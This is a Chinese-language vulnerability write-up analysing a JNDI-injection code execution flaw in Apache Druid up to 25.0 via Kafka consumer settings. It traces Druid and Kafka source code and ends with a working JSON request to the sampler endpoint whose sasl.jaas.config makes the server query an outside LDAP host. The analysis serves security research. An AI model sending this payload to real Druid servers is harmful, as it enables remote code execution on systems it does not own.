Kafka命令执行漏洞二-Apache Druid 代码执行漏洞

一、漏洞简介

Apache Kafka

Kafka是由Apache软件基金会开发的一个开源流处理平台,由Scala和Java编写。该项目的目标是为处理实时数据提供一个统一、高吞吐、低延迟的平台。其持久化层本质上是一个“按照分布式事务日志架构的大规模发布/订阅消息队列”,这使它作为企业级基础设施来处理流式数据非常有价值。

此漏洞允许服务器连接到攻击者的 LDAP 服务器并反序列化 LDAP 响应,攻击者可以使用它在 Kafka 连接服务器上执行 java 反序列化小工具链。当类路径中有小工具时,攻击者可以造成不可信数据的无限制反序列化(或)RCE 漏洞。

此漏洞利用的前提是:需要访问 Kafka Connect worker,并能够使用任意 Kafka 客户端 SASL JAAS 配置和基于 SASL 的安全协议在其上创建/修改连接器。 自 Apache Kafka 2.3.0 以来,这在 Kafka Connect 集群上是可能的。 通过 Kafka Connect REST API 配置连接器时,经过身份验证的操作员可以将连接器的任何 Kafka 客户端的 sasl.jaas.config 属性设置为“com.sun.security.auth.module.JndiLoginModule”,它可以是通过“producer.override.sasl.jaas.config”,“consumer.override.sasl.jaas.config”或“admin.override.sasl.jaas.config”属性完成。

Apache Druid

Apache Druid是一个高性能的实时大数据分析引擎,支持快速数据摄取、实时查询和数据可视化。它主要用于OLAP(在线分析处理)场景,能处理PB级别的数据。Druid具有高度可扩展、低延迟和高吞吐量的特点,广泛应用于实时监控、事件驱动分析、用户行为分析、网络安全等领域。通过使用Druid,企业和开发者可以快速获得实时分析结果,提升决策效率。

漏洞原理

Apache Druid可添加Apache Kafka数据,存在Apache Kafka导致的JNDI注入漏洞,造成远程代码执行

漏洞影响范围

Apache Druid <= 25.0

二、KafkaConsumer

上篇讲到Producer<String, String> producer = new KafkaProducer<>(props); 可造成JNDI注入

org.apache.kafka.clients.consumer.KafkaConsumer

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
public KafkaConsumer(Map<String, Object> configs) {
this((Map)configs, (Deserializer)null, (Deserializer)null);
}

public KafkaConsumer(Properties properties) {
this((Properties)properties, (Deserializer)null, (Deserializer)null);
}

public KafkaConsumer(Properties properties, Deserializer<K> keyDeserializer, Deserializer<V> valueDeserializer) {
this(Utils.propsToMap(properties), keyDeserializer, valueDeserializer);
}

public KafkaConsumer(Map<String, Object> configs, Deserializer<K> keyDeserializer, Deserializer<V> valueDeserializer) {
this(new ConsumerConfig(ConsumerConfig.appendDeserializerToConfig(configs, keyDeserializer, valueDeserializer)), keyDeserializer, valueDeserializer);
}

//最终调用至此构造方法
KafkaConsumer(ConsumerConfig config, Deserializer<K> keyDeserializer, Deserializer<V> valueDeserializer) {
this.closed = false;
this.currentThread = new AtomicLong(-1L);
this.refcount = new AtomicInteger(0);

try {
GroupRebalanceConfig groupRebalanceConfig = new GroupRebalanceConfig(config, ProtocolType.CONSUMER);
this.groupId = Optional.ofNullable(groupRebalanceConfig.groupId);
this.clientId = config.getString("client.id");
LogContext logContext;
if (groupRebalanceConfig.groupInstanceId.isPresent()) {
logContext = new LogContext("[Consumer instanceId=" + (String)groupRebalanceConfig.groupInstanceId.get() + ", clientId=" + this.clientId + ", groupId=" + (String)this.groupId.orElse("null") + "] ");
} else {
logContext = new LogContext("[Consumer clientId=" + this.clientId + ", groupId=" + (String)this.groupId.orElse("null") + "] ");
}

this.log = logContext.logger(this.getClass());
boolean enableAutoCommit = config.maybeOverrideEnableAutoCommit();
this.groupId.ifPresent((groupIdStr) -> {
if (groupIdStr.isEmpty()) {
this.log.warn("Support for using the empty group id by consumers is deprecated and will be removed in the next major release.");
}

});
this.log.debug("Initializing the Kafka consumer");
this.requestTimeoutMs = (long)config.getInt("request.timeout.ms");
this.defaultApiTimeoutMs = config.getInt("default.api.timeout.ms");
this.time = Time.SYSTEM;
this.metrics = buildMetrics(config, this.time, this.clientId);
this.retryBackoffMs = config.getLong("retry.backoff.ms");
List<ConsumerInterceptor<K, V>> interceptorList = config.getConfiguredInstances("interceptor.classes", ConsumerInterceptor.class, Collections.singletonMap("client.id", this.clientId));
this.interceptors = new ConsumerInterceptors(interceptorList);
if (keyDeserializer == null) {
this.keyDeserializer = (Deserializer)config.getConfiguredInstance("key.deserializer", Deserializer.class);
this.keyDeserializer.configure(config.originals(Collections.singletonMap("client.id", this.clientId)), true);
} else {
config.ignore("key.deserializer");
this.keyDeserializer = keyDeserializer;
}

if (valueDeserializer == null) {
this.valueDeserializer = (Deserializer)config.getConfiguredInstance("value.deserializer", Deserializer.class);
this.valueDeserializer.configure(config.originals(Collections.singletonMap("client.id", this.clientId)), false);
} else {
config.ignore("value.deserializer");
this.valueDeserializer = valueDeserializer;
}

OffsetResetStrategy offsetResetStrategy = OffsetResetStrategy.valueOf(config.getString("auto.offset.reset").toUpperCase(Locale.ROOT));
this.subscriptions = new SubscriptionState(logContext, offsetResetStrategy);
ClusterResourceListeners clusterResourceListeners = this.configureClusterResourceListeners(keyDeserializer, valueDeserializer, this.metrics.reporters(), interceptorList);
this.metadata = new ConsumerMetadata(this.retryBackoffMs, config.getLong("metadata.max.age.ms"), !config.getBoolean("exclude.internal.topics"), config.getBoolean("allow.auto.create.topics"), this.subscriptions, logContext, clusterResourceListeners);
List<InetSocketAddress> addresses = ClientUtils.parseAndValidateAddresses(config.getList("bootstrap.servers"), config.getString("client.dns.lookup"));
this.metadata.bootstrap(addresses);
String metricGrpPrefix = "consumer";
FetcherMetricsRegistry metricsRegistry = new FetcherMetricsRegistry(Collections.singleton("client-id"), metricGrpPrefix);
//调用至ClientUtils.createChannelBuilder 接下来调用链与一相同,不再赘述
ChannelBuilder channelBuilder = ClientUtils.createChannelBuilder(config, this.time, logContext);
this.isolationLevel = IsolationLevel.valueOf(config.getString("isolation.level").toUpperCase(Locale.ROOT));
Sensor throttleTimeSensor = Fetcher.throttleTimeSensor(this.metrics, metricsRegistry);
int heartbeatIntervalMs = config.getInt("heartbeat.interval.ms");
ApiVersions apiVersions = new ApiVersions();
NetworkClient netClient = new NetworkClient(new Selector(config.getLong("connections.max.idle.ms"), this.metrics, this.time, metricGrpPrefix, channelBuilder, logContext), this.metadata, this.clientId, 100, config.getLong("reconnect.backoff.ms"), config.getLong("reconnect.backoff.max.ms"), config.getInt("send.buffer.bytes"), config.getInt("receive.buffer.bytes"), config.getInt("request.timeout.ms"), config.getLong("socket.connection.setup.timeout.ms"), config.getLong("socket.connection.setup.timeout.max.ms"), this.time, true, apiVersions, throttleTimeSensor, logContext);
......
} catch (Throwable var18) {
if (this.log != null) {
this.close(0L, true);
}

throw new KafkaException("Failed to construct kafka consumer", var18);
}
}

三、Apache Druid环境配置

1、修改jvm.config,远程debug

目录为apache-druid-xxx\conf\druid\single-server\micro-quickstart\coordinator-overlord\jvm.config

1
2
3
4
-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005
suspend=n表示的是启动Java应用时是否立即进入调试模式;
suspend=y表示启动即暂停,suspend=n则表示启动时不需要暂停;
address=*:5005表示的是Debug监听的服务地址和端口,根据需求修改,上述配置会监听到0.0.0.0

img

2、启动Apache Druid

运行bin/下start-micro-quickstart

img

访问ip:8888,成功访问

img

四、漏洞分析

前端输入

Apache Druid添加kafka

img

源码分析

存在漏洞API接口为/druid/indexer/v1/sampler

接口类如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
//路径
@Path("/druid/indexer/v1/sampler")
public class SamplerResource{
//post方法
@POST
//指定http请求的MIME类型为application/json
@Consumes(MediaType.APPLICATION_JSON)
//指定http响应的MIME类型application/json
@Produces(MediaType.APPLICATION_JSON)
@ResourceFilters(StateResourceFilter.class)
public SamplerResponse post(final SamplerSpec sampler){
//Preconditions.checkNotNull(sampler, "Request body cannot be empty") 判断sampler是否为空
//调用sampler#sample()方法
return Preconditions.checkNotNull(sampler, "Request body cannot be empty").sample();
}
}

org.apache.druid.client.indexing.SamplerSpec为接口,声明方法sample()

1
2
3
4
5
6
//用于配置JSON 序列化和反序列化过程中使用哪种类型信息。该注解是实现多态类型的必要注解。
//配置此即可在 json 中通过 type 定义反序列化为子类
@JsonTypeInfo(use = JsonTypeInfo.Id.NAME, property = "type")
public interface SamplerSpec{
SamplerResponse sample();
}

img

org.apache.druid.indexing.seekablestream.SeekableStreamSamplerSpec实现接口SamplerSpec

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
public SeekableStreamSamplerSpec(
//ingestionSpec
final SeekableStreamSupervisorSpec ingestionSpec,
@Nullable final SamplerConfig samplerConfig,
final InputSourceSampler inputSourceSampler
)
{
//ingestionSpec不为空 dataSchema为ingestionSpec.dataSchema
this.dataSchema = Preconditions.checkNotNull(ingestionSpec, "[spec] is required").getDataSchema();
//ioConfig不为空
this.ioConfig = Preconditions.checkNotNull(ingestionSpec.getIoConfig(), "[spec.ioConfig] is required");
this.tuningConfig = ingestionSpec.getTuningConfig();
this.samplerConfig = samplerConfig == null ? SamplerConfig.empty() : samplerConfig;
this.inputSourceSampler = inputSourceSampler;
}
//API接口中sample()调用至此
@Override
public SamplerResponse sample()
{
final InputSource inputSource;
final InputFormat inputFormat;
if (dataSchema.getParser() != null) {
inputSource = new FirehoseFactoryToInputSourceAdaptor(
new SeekableStreamSamplerFirehoseFactory(),
dataSchema.getParser()
);
inputFormat = null;
} else {
RecordSupplier<PartitionIdType, SequenceOffsetType, RecordType> recordSupplier;
//调用至子类KafkaSamplerSpeccreateRecordSupplier()
try {
recordSupplier = createRecordSupplier();
}
catch (Exception e) {
throw new SamplerException(e, "Unable to create RecordSupplier: %s", Throwables.getRootCause(e).getMessage());
}

inputSource = new RecordSupplierInputSource<>(
ioConfig.getStream(),
recordSupplier,
ioConfig.isUseEarliestSequenceNumber(),
samplerConfig.getTimeoutMs() <= 0 ? null : samplerConfig.getTimeoutMs()
);
inputFormat = Preconditions.checkNotNull(
ioConfig.getInputFormat(),
"[spec.ioConfig.inputFormat] is required"
);
}

return inputSourceSampler.sample(inputSource, inputFormat, dataSchema, samplerConfig);
}

img

org.apache.druid.indexing.kafka.KafkaSamplerSpec继承类SeekableStreamSamplerSpec

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
//继承类SeekableStreamSamplerSpec
public class KafkaSamplerSpec extends SeekableStreamSamplerSpec{
private final ObjectMapper objectMapper;

@JsonCreator
public KafkaSamplerSpec(
//将 json 中 spec 转换为KafkaSupervisorSpec ingestionSpec属性
@JsonProperty("spec") final KafkaSupervisorSpec ingestionSpec,
//将 json 中 samplerConfig 转换为SamplerConfig samplerConfig属性
@JsonProperty("samplerConfig") @Nullable final SamplerConfig samplerConfig,
//值为空注入默认值
@JacksonInject InputSourceSampler inputSourceSampler,
@JacksonInject ObjectMapper objectMapper
){
//调用父类构造方法
//ingestionSpec为 json 中 spec
super(ingestionSpec, samplerConfig, inputSourceSampler);

this.objectMapper = objectMapper;
}

//调用至此方法
@Override
protected KafkaRecordSupplier createRecordSupplier()
{
ClassLoader currCtxCl = Thread.currentThread().getContextClassLoader();
try {
Thread.currentThread().setContextClassLoader(getClass().getClassLoader());
//声明map 将ioConfig中数据添加至map
final Map<String, Object> props = new HashMap<>(((KafkaSupervisorIOConfig) ioConfig).getConsumerProperties());
//向map中插入值
props.put("enable.auto.commit", "false");
props.put("auto.offset.reset", "none");
props.put("request.timeout.ms", Integer.toString(samplerConfig.getTimeoutMs()));
//new KafkaRecordSupplier
//proos为前面声明的map objectMapper ioConfig为ingestionSpec中ioConfig
return new KafkaRecordSupplier(props, objectMapper, ((KafkaSupervisorIOConfig) ioConfig).getConfigOverrides());
}
finally {
Thread.currentThread().setContextClassLoader(currCtxCl);
}
}
}

img

org.apache.druid.indexing.kafka.supervisor.KafkaSupervisorSpec

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
@JsonCreator
public KafkaSupervisorSpec(
@JsonProperty("spec") @Nullable KafkaSupervisorIngestionSpec ingestionSchema,
@JsonProperty("dataSchema") @Nullable DataSchema dataSchema,
@JsonProperty("tuningConfig") @Nullable KafkaSupervisorTuningConfig tuningConfig,
//spec json中ioConfig为KafkaSupervisorIOConfig ioConfig
@JsonProperty("ioConfig为") @Nullable KafkaSupervisorIOConfig ioConfig,
@JsonProperty("context") Map<String, Object> context,
@JsonProperty("suspended") Boolean suspended,
@JacksonInject TaskStorage taskStorage,
@JacksonInject TaskMaster taskMaster,
@JacksonInject IndexerMetadataStorageCoordinator indexerMetadataStorageCoordinator,
@JacksonInject KafkaIndexTaskClientFactory kafkaIndexTaskClientFactory,
@JacksonInject @Json ObjectMapper mapper,
@JacksonInject ServiceEmitter emitter,
@JacksonInject DruidMonitorSchedulerConfig monitorSchedulerConfig,
@JacksonInject RowIngestionMetersFactory rowIngestionMetersFactory,
@JacksonInject SupervisorStateManagerConfig supervisorStateManagerConfig
)
{
super(
ingestionSchema != null
? ingestionSchema
: new KafkaSupervisorIngestionSpec(
dataSchema,
ioConfig,
tuningConfig != null
? tuningConfig
: KafkaSupervisorTuningConfig.defaultConfig()
),
context,
suspended,
taskStorage,
taskMaster,
indexerMetadataStorageCoordinator,
kafkaIndexTaskClientFactory,
mapper,
emitter,
monitorSchedulerConfig,
rowIngestionMetersFactory,
supervisorStateManagerConfig
);
}

org.apache.druid.indexing.kafka.supervisor.KafkaSupervisorIOConfig

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
@JsonCreator
public KafkaSupervisorIOConfig(
@JsonProperty("topic") String topic,
@JsonProperty("inputFormat") InputFormat inputFormat,
@JsonProperty("replicas") Integer replicas,
@JsonProperty("taskCount") Integer taskCount,
@JsonProperty("taskDuration") Period taskDuration,
@JsonProperty("consumerProperties") Map<String, Object> consumerProperties,
@Nullable @JsonProperty("autoScalerConfig") AutoScalerConfig autoScalerConfig,
@JsonProperty("pollTimeout") Long pollTimeout,
@JsonProperty("startDelay") Period startDelay,
@JsonProperty("period") Period period,
@JsonProperty("useEarliestOffset") Boolean useEarliestOffset,
@JsonProperty("completionTimeout") Period completionTimeout,
@JsonProperty("lateMessageRejectionPeriod") Period lateMessageRejectionPeriod,
@JsonProperty("earlyMessageRejectionPeriod") Period earlyMessageRejectionPeriod,
@JsonProperty("lateMessageRejectionStartDateTime") DateTime lateMessageRejectionStartDateTime,
@JsonProperty("configOverrides") KafkaConfigOverrides configOverrides,
@JsonProperty("idleConfig") IdleConfig idleConfig
)
{
super(
//topic不为空
Preconditions.checkNotNull(topic, "topic"),
inputFormat,
replicas,
taskCount,
taskDuration,
startDelay,
period,
useEarliestOffset,
completionTimeout,
lateMessageRejectionPeriod,
earlyMessageRejectionPeriod,
autoScalerConfig,
lateMessageRejectionStartDateTime,
idleConfig
);

this.consumerProperties = Preconditions.checkNotNull(consumerProperties, "consumerProperties");
Preconditions.checkNotNull(
consumerProperties.get(BOOTSTRAP_SERVERS_KEY),
StringUtils.format("consumerProperties must contain entry for [%s]", BOOTSTRAP_SERVERS_KEY)
);
this.pollTimeout = pollTimeout != null ? pollTimeout : DEFAULT_POLL_TIMEOUT_MILLIS;
this.configOverrides = configOverrides;
}

org.apache.druid.indexing.kafka.KafkaRecordSupplier

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
//构造方法,代码调用至此构造方法
public KafkaRecordSupplier(
Map<String, Object> consumerProperties,
ObjectMapper sortingMapper,
KafkaConfigOverrides configOverrides
)
{
this(getKafkaConsumer(sortingMapper, consumerProperties, configOverrides));
}


//构造方法中调用至getKafkaConsumer()
//sortingMapper 为KafkaSamplerSpec中objectMapper
//consumerProperties 为声明的map props 主要数据均在此map中
//configOverrides 为KafkaSamplerSpec KafkaSupervisorIngestionSpec 中ConfigOverrides
public static KafkaConsumer<byte[], byte[]> getKafkaConsumer(
ObjectMapper sortingMapper,
Map<String, Object> consumerProperties,
KafkaConfigOverrides configOverrides
)
{
final Map<String, Object> consumerConfigs = KafkaConsumerConfigs.getConsumerProperties();
final Properties props = new Properties();
Map<String, Object> effectiveConsumerProperties;
//
if (configOverrides != null) {
effectiveConsumerProperties = configOverrides.overrideConfigs(consumerProperties);
} else {
effectiveConsumerProperties = consumerProperties;
}
//将 effectiveConsumerProperties 中数据添加至 props 中
addConsumerPropertiesFromConfig(
props,
sortingMapper,
effectiveConsumerProperties
);
props.putIfAbsent("isolation.level", "read_committed");
props.putIfAbsent("group.id", StringUtils.format("kafka-supervisor-%s", IdUtils.getRandomId()));
props.putAll(consumerConfigs);

ClassLoader currCtxCl = Thread.currentThread().getContextClassLoader();
try {
Thread.currentThread().setContextClassLoader(KafkaRecordSupplier.class.getClassLoader());
Deserializer keyDeserializerObject = getKafkaDeserializer(props, "key.deserializer", true);
Deserializer valueDeserializerObject = getKafkaDeserializer(props, "value.deserializer", false);
//new KafkaConsumer<> props为前端出入数据
return new KafkaConsumer<>(props, keyDeserializerObject, valueDeserializerObject);
}
finally {
Thread.currentThread().setContextClassLoader(currCtxCl);
}
}

img

img

调用至new KafkaConsumer()

img

JNDI注入成功(此处DNSLog模拟,真实JNDI注入需可访问JNDI恶意服务器,也需要注意JDK版本现限制)

img

payload

精简后payload

bootstrap.servers 可为任意值

sasl.jaas.config 值参考上一篇

topic 不为空

dataSchema 不为空

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
{
"type":"kafka",
"spec":{
"type":"kafka",
"ioConfig":{
"type":"kafka",
"consumerProperties":{
"bootstrap.servers":"6.6.6.6:9092",
"security.protocol":"SASL_SSL",
"sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://lc7g01.dnslog.cn\" useFirstPass=\"true\" serviceName=\"x\" group.provider.url=\"xxx\";"
},
"topic":"any"
},
"dataSchema":{
"dataSource":"sample",
"timestampSpec":{
"column":"!!!_no_such_column_!!!",
"missingValue":"1970-01-01T00:00:00Z"
},
"dimensionsSpec":{

},
"granularitySpec":{
"rollup":false
}
}
}
}

Kafka命令执行漏洞二-Apache Druid 代码执行漏洞
http://example.com/2023/04/23/Kafka命令执行漏洞二-Apache-Druid-代码执行漏洞/
作者
白给
发布于
2023年4月23日
许可协议